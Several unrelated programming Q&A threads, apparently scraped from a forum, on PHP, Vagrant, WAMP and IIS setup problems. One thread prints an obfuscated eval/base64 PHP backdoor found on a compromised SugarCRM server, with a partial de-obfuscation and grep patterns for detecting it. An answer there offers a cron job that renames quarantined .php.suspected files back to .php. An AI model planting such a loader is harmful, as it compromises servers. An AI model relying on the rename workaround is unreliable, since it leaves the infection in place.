I get false whenever I use the function is_readable on a file shared by my host on a VM, the expected result is true.
I am doing the setup of a local development environment for an existing projet. I don't want to use another function because it's a complex legacy system and I am afraid I would hide other potential problems I would stumble upon later in development.
The VM is set up using vagrant and virtualbox. The OS is a Windows Server 2008 machine with Zend Server with PHP 5.3 hosting code shared on the host, which is a Mac.
The shared folder is created as follow:
vmConfig.vm.synced_folder "/path/to/shared/folder/cms", '/cms', mount_options: ["dmode=775,fmode=664,type=smb"], owner: 'wcmadmin', group: 'wcmadmin'
A piece of code is trying to see if a file is readable. is_readable returns false. I run the script via command line with both users wcmadmin and Administrator and I get the same results.
function smarty_core_assemble_plugin_filepath($params, &$smarty)
{
[...]
// try relative to cwd (or absolute)
if (is_readable($_plugin_filepath)) {
$_return = $_plugin_filepath;
break;
}
[...]
I did a test script to dig further:
echo 'is_readable: ';
var_export(is_readable('C:\cms\path\to\file\file.php'));
echo "\n";
echo 'require_once: ';
var_export(require_once('C:\cms\path\to\file\file.php'));
And I have the following results:
is_readable: false
require_once: true
Using file_get_contents on the file returns the content correctly.
Using cygwin, the permissions on the file are as follow:
$ ls -al C:\cms\path\to\file\file.php
-rw-r--r-- 1 wcmadmin None 1498 Apr 18 07:22 C:\cms\path\to\file\file.php
Files path have been changed for the purpose of this question. While they may have some discrepancies, they resolve correctly during real tests.
It's a bug in virtual box and is still happening as of version 5.0.18.
See:
https://www.virtualbox.org/ticket/11675
I have recently built my local test server WAMP by using Windows 7 Pro 64bit OS. I have also chosen to use the 32bit programs (Apache, MySQL & PHP) so my WAMP spec would be x86 V11 binary Thread Safe (TS). I want to keep all development related items into the C:\dev folder or directory, so my file system looks like this:
C:\dev\bin\apache24\
C:\dev\bin\MySQL5.6\
C:\dev\bin\PHP5.6\
C:\dev\www\phpMysqlAdmin
C:\dev\www\HollyGhost.com\login.php
Settings: my.ini
# Path to the installation directory.
basedir = "C:/dev/bin/MySQL5.6/"
# Path to the database data directory
datadir = "C:/dev/bin/MySQL5.6/data/"
# The TCP/IP Port the MySQL Server will listen on
port = 3306
# Server Id.
server_id = 1
C:\Winows\System32\drivers\etc\hosts
127.0.0.1 localhost
If I need to view the web site: http://localhost/HollyGhost.com/login.php the site comes up without any issues and works great; but if I rewrite the URL on the same box to: http://127.0.0.1/HollyGhost.com/login.php the site renders the login page but I cannot log into the system. All I am getting when I attempt to log in is the login page keeps refreshing. I tried to do the same from another PC and I am getting the same result. I need to do this so I can test other devices locally.
Any help is greatly appreciated. I am not sure if this issue is a permission problem based on the fact that MySQL data is stored in the \MySQl5.6\data directory. If so, how do I go about fixing it.
The problem was in the Windows Firewall -> Advance setting -> Inbound Rules. The Inbound Rules for MySQL Profile was set to Private and the Program was set to Any. I change Profile to "Domain, Private" and set Program to point to MySQL installation directory "MySQL.exe" this works for me after rebooting all network devices and PCs.
Since last 4 days, we are facing strange issue on our Production server (AWS EC2 instance) specific to only one site which is SugarCRM.
Issue is /home/site_folder/public_html/include/MassUpdate.php file is renamed automatically to /home/site_folder/public_html/include/MassUpdate.php.suspected
This happens 2-3 times in a day with 3-4 hours of gap. This issue occurs only in case of specific site, even it doesn't occur for staging replica of the same site. I even checked code of that file from both sites, it's same.
We have Googled and found, such issue occurs mostly for Wordpress sites and it could be because of attack. But we checked our server against the attack, there isn't any. Also there is no virus/malware scan running on server.
What should we do?
Update:
We found few things after going through this link
We executed egrep -Rl 'function.*for.*strlen.*isset' /home/username/public_html/ And found that there are few files with following sample code.
<?php
function flnftovr($hkbfqecms, $bezzmczom){$ggy = ''; for($i=0; $i < strlen($hkbfqecms); $i++){$ggy .= isset($bezzmczom[$hkbfqecms[$i]]) ? $bezzmczom[$hkbfqecms[$i]] : $hkbfqecms[$i];}
$ixo="base64_decode";return $ixo($ggy);}
$s = 'DMtncCPWxODe8uC3hgP3OuEKx3hjR5dCy56kT6kmcJdkOBqtSZ91NMP1OuC3hgP3h3hjRamkT6kmcJdkOBqtSZ91NJV'.
'0OuC0xJqvSMtKNtPXcJvt8369GZpsZpQWxOlzSMtrxCPjcJvkSZ96byjbZgtgbMtWhuCXbZlzHXCoCpCob'.'zxJd7Nultb4qthgtfNMtixo9phgCWbopsZ1X=';
$koicev = Array('1'=>'n', '0'=>'4', '3'=>'y', '2'=>'8', '5'=>'E', '4'=>'H', '7'=>'j', '6'=>'w', '9'=>'g', '8'=>'J', 'A'=>'Y', 'C'=>'V', 'B'=>'3', 'E'=>'x', 'D'=>'Q', 'G'=>'M', 'F'=>'i', 'I'=>'P', 'H'=>'U', 'K'=>'v', 'J'=>'W', 'M'=>'G', 'L'=>'L', 'O'=>'X', 'N'=>'b', 'Q'=>'B', 'P'=>'9', 'S'=>'d', 'R'=>'I', 'U'=>'r', 'T'=>'O', 'W'=>'z', 'V'=>'F', 'Y'=>'q', 'X'=>'0', 'Z'=>'C', 'a'=>'D', 'c'=>'a', 'b'=>'K', 'e'=>'o', 'd'=>'5', 'g'=>'m', 'f'=>'h', 'i'=>'6', 'h'=>'c', 'k'=>'p', 'j'=>'s', 'm'=>'A', 'l'=>'R', 'o'=>'S', 'n'=>'u', 'q'=>'N', 'p'=>'k', 's'=>'7', 'r'=>'t', 'u'=>'2', 't'=>'l', 'w'=>'e', 'v'=>'1', 'y'=>'T', 'x'=>'Z', 'z'=>'f');
eval(flnftovr($s, $koicev));?>
Seems some malware, how we go about removing it permanently?
Thanks
The renaming of .php files to .php.suspected keeps happening today. The following commands should not come up with something:
find <web site root> -name '*.suspected' -print
find <web site root> -name '.*.ico' -print
In my case, the infected files could be located with the following commands:
cd <web site root>
egrep -Rl '\$GLOBALS.*\\x'
egrep -Rl -Ezo '/\*(\w+)\*/\s*#include\s*[^;]+;\s*/\*'
egrep -Rl -E '^.+(\$_COOKIE|\$_POST).+eval.+$'
I have prepared a longer description of the problem and how to deal with it at GitHub.
It's somewhat obfuscated, but I've de-obfuscated it.The function flnftovr takes a string and an array as arguments. It creates a new string $ggy using the formula
isset($array[$string[$i]]) ? $array[$string[$i]] : $string[$i];}
It then preppends base64_decode to the string.
The string is $s, the array is $koicev. It then evals the result of this manipulation. So eventually a string gets created:
base64_decode(QGluaV9zZXQoJ2Vycm9yX2xvZycsIE5VTEwpOwpAaW5pX3NldCgnbG9nX2Vycm9ycycsIDApOwpAaW5pX3NldCgnbWF4X2V4ZWN1dGlvbl90aW1lJywgMCk7CkBzZXRfdGltZV9saW1pdCgwKTsKCmlmKGlzc2V0KCRfU0VSVkVSKfZW5jb2RlKHNlcmlhbGl6ZSgkcmVzKSk7Cn0=)
So what actually gets run on your server is:
#ini_set('error_log', NULL);
#ini_set('log_errors', 0);
#ini_set('max_execution_time', 0);
#set_time_limit(0);
if(isset($_SERVER)
encode(serialize($res));
}
If you didn't create this and you suspect your site has been hacked, I'd suggest you wipe the server, and create a new installation of whatever apps are running on your server.
Renaming php files to php.suspected is usually intended and done by hacker's script. They change file extension to give the impression that the file was checked by some antimalware software, is secure and can't be executed. But, in fact, isn't. They change extension to "php" anytime they want to invoke the script and after it, they change the extension back to "suspected".
You can read about it on Securi Research Labs
Maybe this post is old but the topic is still alive. Especially according to June 2019 malware campaign targeting WordPress plugins. I found a few "suspected" files in my client's WordPress subdirectories (e.g. wp-content)
Posting this answer, it may help others.
Create a file with '.sh' extension at your convenient location.
Add following code in it.
#Rename your_file_name.php.suspected to your_file_name.php
mv /<path_to_your_file>/your_file_name.php.suspected /<path_to_your_file>/your_file_name.php
Save this file.
Set cron for every 10 minute (or whatever interval you need), using following line in crontab
*/10 * * * * path_to_cron_file.sh
Restart crontab service.
You will get lot of documentation on creating cron on Google.
I'm having a strange problem with my vagrant setup: changing characters in a file and saving it doesn't reflect the change in the vm. But if I add/remove some characters or add in a few blank links, everything works fine.
I have already checked if I have opcache enabled on my PHP5.5 and "php -i | grep opcache" get any result ... so I imagine it's no.
Already tested too another vagrant (1.7.2) version, same result.
My configuration is :
Windows 7 Pro
Vagrant 1.6.3 with plugin WinNFSd
VirtualBox 4.3.12
Centos6.5 Box
PHP 5.5.19
Apache 2.4.10
PhpStorm 8 (but problem is same with SublimeText 3 and Notepad++)
Here is a video of a test from me for show you the problem :
https://www.dropbox.com/s/k70fiwfw6mopjs7/2015-03-24%2020-47-07.mp4?dl=0
Two weeks I work on this problem, it will make me crazy ...
I already tried Rsync and Samba or default vagrant synch folder but it doesn't meet my needs.
I really appreciate your help guys!
The problem on sublime was atomic_save setting being true. Not sure if there is an equivalent setting for PHPStorm/Notepad++
https://github.com/mitchellh/vagrant/issues/3888
I have been trying to figure out a way to manage our domains at work and easily created a SimpleDNS class, but now I'm on the IIS Server Administration side of it and I'm just lost on what is going on.
Here is the PHP code I am running to test it.
<?php
$cmd = 'iisweb /create c:\websites\examplesite.com\www "Example Domain!" /d www.examplesite.com';
exec($cmd,$data);
print_r($data);
?>
But when I run it I get:
Array ( [0] => Error &H80041003: Access denied
I am completely stumped on how to set up permissions for this.
Here's the good part! When I run <?php exec('ping google.com',$data);?>: it works seamlessly.
I have no idea where to start when it comes to setting up the permissions for iisweb.vbs (the iisweb vbs file). I don't even know if I'm supposed to set up permissions on that file. I don't know if I'm supposed to setup a CGI option in the console. I'm lost.
Can someone help me out? What am I doing here?
Your code will be running under one of two identities.
The identity of the Application Pool that the website runs in (NETWORK SERVICE for example if the defaults were used). You can find this out by opening the property window for an application pool and selecting the Identity tab.
The identity of the website anonymous user which you can find in Website Properties -> Directory Security -> Authentication and access control (click the edit button).
FastCGI
If you're running PHP under FastCGI and the c:\php\php.ini configuration value fastcgi.impersonate = 1 then user identity be the site anonymous user (option 2) above. If fastcgi.impersonate = 0 then PHP scripts will execute under the identity of the application pool (option 1).
You can tell if PHP is configured to execute under FastCGI by looking at the .php scriptmap for the site (Website Properties -> Home Directory -> Configuration -> Application Extensions). If it's set to C:\WINDOWS\system32\inetsrv\fcgiext.dll then you're running FastCGI.
No FastCGI
If your .php script map is not configured to use C:\WINDOWS\system32\inetsrv\fcgiext.dll
then scripts will run under the identity of the site anonymous user (option 2 above).
In all cases the account used must have Administrators rights to be able to run the IIS admin scripts.